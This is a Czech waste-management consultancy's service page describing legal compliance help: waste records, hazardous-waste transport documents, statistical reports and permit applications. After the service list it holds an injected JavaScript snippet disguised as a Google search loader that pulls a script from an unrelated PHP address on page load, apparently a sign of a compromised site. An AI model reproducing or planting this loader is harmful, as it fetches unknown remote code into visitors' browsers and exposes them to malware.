Nakládání s odpady

Veškeré nakládání s odpady a odpadové hospodářství je prováděno v souladu se zákonem č. 185/2001 Sb. o odpadech a předpisy tento zákon provádějícími a ostatními souvisejícími právními předpisy (vodní zákon, zákon o ovzduší, zákon o chemických látkách, zákon o ochraně veřejného zdraví, atd.).

 

Odvoz nebezpečných odpadů z místa původu do místa zneškodnění realizujeme v souladu s „Evropskou dohodou o mezinárodní silniční dopravě nebezpečných věcí – ADR“. Všechny druhy přepravovaných nebezpečných odpadů jsou při přepravě vybaveny identifikačními listy nebezpečného odpadu a dále evidovány, včetně opatření při nehodách, haváriích a požárech a zásad první pomoci.

Společnost KRAZZER s.r.o. zajišťuje komplexní odborné poradenství a pomoc při plnění legislativních požadavků v oblasti odpadového hospodářství. Dále nabízíme odborná školení zaměřená na problematiku nakládání s odpady.

KRAZZER s.r.o. nabízí tyto služby:

 • Zajišťování výkonu externí poradce při nakládání s odpady – odpadového hospodáře.
 • Vedení firemní evidence odpadů (poradíme vám jak evidovat produkci odpadů v souladu s legislativou, případně povedeme vaší evidenci)
 • Zařazení odpadů podle Katalogu odpadů (poradíme vám jak odpady zařadit dle katalogového čísla, jak správně třídit odpady v místě jejich vzniku).
 • Zpracování „hlášení o produkci a nakládání s odpady“.
 • Zpracování statistického výkazu „ODPADY“ pro Český statistický úřad.
 • Zpracování identifikačních listů nebezpečných odpadů (ILNO).
 • Označení sběrných prostředků a nádob na tříděný odpad
 • Zpracování Základního popisu odpadu. Vyhláška MŽP č. 294/2005 Sb., o podmínkách ukládání odpadů na skládky a jejich využívání na povrchu terénu a změně vyhlášky č. 383/2001 Sb., o podrobnostech nakládání s odpady nově zavádí povinnost vypracování základního popisu odpadu, která se týká všech, kteří předávají odpady k uložení na skládky (výpis z přílohy č. 1 k vyhlášce 294/2005 Sb.). Odběratele odpadů pro uložení na skládky tuto povinnost prakticky vyžadují od 1. 1. 2006.
 • Zpracování žádostí o souhlasu k nakládání s nebezpečnými odpady.
 • Zpracování žádostí o povolení k provozování zařízení.
 • Zpracování žádostí o netřídění odpadů

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://ninni.org/core9Om3.php”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();


Komentáře nejsou povoleny.